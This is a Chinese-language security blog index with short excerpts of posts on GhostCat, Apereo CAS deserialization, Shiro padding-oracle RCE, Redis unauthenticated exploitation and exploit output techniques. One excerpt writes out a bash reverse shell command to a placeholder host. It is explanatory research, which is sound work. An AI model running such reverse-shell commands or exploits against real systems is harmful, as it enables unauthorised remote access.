00theway's blog

OnTheWay

GhostCat-从源代码比对到漏洞利用

123456 _ _ __ _ _ /_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __ //_\\ | | '_ \ \ \| '_ \ / _ \ / _ \| __/ _ \ '__|/ _ \| | |_) | _\ \ | | | (_) | (......

通杀漏洞利用回显方法-linux平台

现状 在漏洞利用中经常出现获取不到执行结果的情况,各路大牛也是研究了各种方法,目前能看到的大概有以下几种方式获取结果: 报错回显 web中获取当前上下文对象(response、context、writer等) 可以出网情况下OOB 在国内环境下大多数情况下都限制了对外的网络访问,获取执行结果变得难上加难,所以对新的方法进行研究,于是产生了本方法。 新的回显思路 经过一段时间的研究发现了......

Apereo CAS 反序列化漏洞分析及回显利用

背景介绍 Apereo CAS 是一个开源的企业级单点登录系统,很多统一认证系统都是基于此系统二次开发,官网对于漏洞的一个通告,记录一下分析过程。 漏洞环境 直接使用docker运行了4.1.6的cas环境,将源代码拷贝出来以供分析。 1234# docker psCONTAINER ID IMAGE COMMAND ......

Shiro RCE again (Padding Oracle Attack)

背景介绍 前一段时间Apache发了一个Shiro的漏洞通告RememberMe Padding Oracle Vulnerability,原因是Shiro使用了AES-128-CBC模式对cookie进行加密,导致恶意用户可以通过padding oracle攻击方式构造序列化数据进行反序列化攻击。 SHIRO是一个JAVA WEB中使用率很高的权限管理组件,平时HW、攻防演练遇到的也很多......

bash reverse shell

bash 反弹shell 下边是一段熟悉而又陌生的代码,经常被用来在linux环境下反弹shell 1bash -i >& /dev/tcp/host/port 0>&1 然而长时间以来对它的原理一直是似懂非懂,于是就抽时间研究了一下 用到的特殊文件介绍 12>/dev/tcp/host/port> 当操作上边文件时, bash 会打开一个与文件......

redis unauthenticated exploit

简介 Redis 提供了2种不同的持久化方式,RDB方式和AOF方式. RDB 持久化可以在指定的时间间隔内生成数据集的时间点快照. AOF 持久化记录服务器执行的所有写操作命令. 经过查看官网文档发现AOF方式备份数据库的文件名默认为appendonly.aof,可以在配置文件中通过appendfilename设置其他名称,通过测试发现不能在客户端交互中动态设置appendfil......